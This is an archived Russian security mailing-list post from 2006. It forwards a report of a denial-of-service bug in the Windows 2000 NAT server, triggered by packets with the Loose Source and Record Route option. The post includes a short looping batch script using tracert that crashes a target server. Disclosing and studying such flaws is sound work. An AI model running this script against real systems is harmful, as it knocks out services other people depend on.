ПРОЕКТЫ 


  АРХИВ 


Apache-Talk @lexa.ru 

Inet-Admins @info.east.ru 

Filmscanners @halftone.co.uk 

Security-alerts @yandex-team.ru 

nginx-ru @sysoev.ru 

  СТАТЬИ 


  ПЕРСОНАЛЬНОЕ 


  ПРОГРАММЫ 



ПИШИТЕ
ПИСЬМА














     АРХИВ :: Security-alerts
Security-Alerts mailing list archive (security-alerts@yandex-team.ru)

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[security-alerts] Fwd: DOS во встроенном NAT сервере Windows 2000




--This is a forwarded message
From: Минаев Андрей <angel3000@xxxxxxxxx>
To: vuln@xxxxxxxxxxxxxxxx <vuln@xxxxxxxxxxxxxxxx>
Date: Thursday, February 9, 2006, 12:44:45 AM
Subject: DOS во встроенном NAT сервере Windows 2000

===8<==============Original message text===============
Обнаружил dos во встроенном NAT сервере Windows 2000

Конфигурация проверенных серверов:
Windows 2000 English Standard/Advanced Service Pack 4 + Update Rollup 1 for 
Service Pack 4
с установленным NAT сервером.
При прохождении ip пакетов через сервер, с включенной опцией "Loose Source and
Record Route" определенной в RFC 791, ОС выпадает в синий экран с
ошибкой в tcpip.sys или ntoskrnl.exe, замирает картинка или сервер
начинает работать нестабильно(в программах вылетают эксепшены). Без
разницы откуда идут пакеты, из внешней или внутренней сети.

Проверить можно следующим образом, запустить командный сценарий с адресом 
сервера подпадающим под условия
определенные выше:

Set targetip=192.168.146.128
:1
tracert -h 1 -j 0.0.0.0 %targetip%
tracert -h 1 -j 0.0.0.0 %targetip%
tracert -h 1 -j 0.0.0.0 %targetip%
tracert -h 1 -j 0.0.0.0 %targetip%
tracert -h 1 -j 0.0.0.0 %targetip%
ping %targetip% -n 1 || goto end
goto 1
:end
@cls
@Echo Server is crash
@pause
exit


Проверял также и на Windows 2003, ошибка не повторилась. Ошибка вроде
вылетала и на Windows 2000 + ISA 2000 но надо проверять. Во
всяком случае у знакомого при отработке этого скрипта с минуту, в конфе
Windows 2000 + ISA 2000, при открытии оснасток стали вылетать
эксепшены. Можно проверить, но это будет в выходные.
ISA 2004 ничего не было, стабильно работал дальше. 



===8<===========End of original message text===========


-- 
~/ZARAZA
Существую лишь я сам, никуда не летя. (Лем)




 




Copyright © Lexa Software, 1996-2009.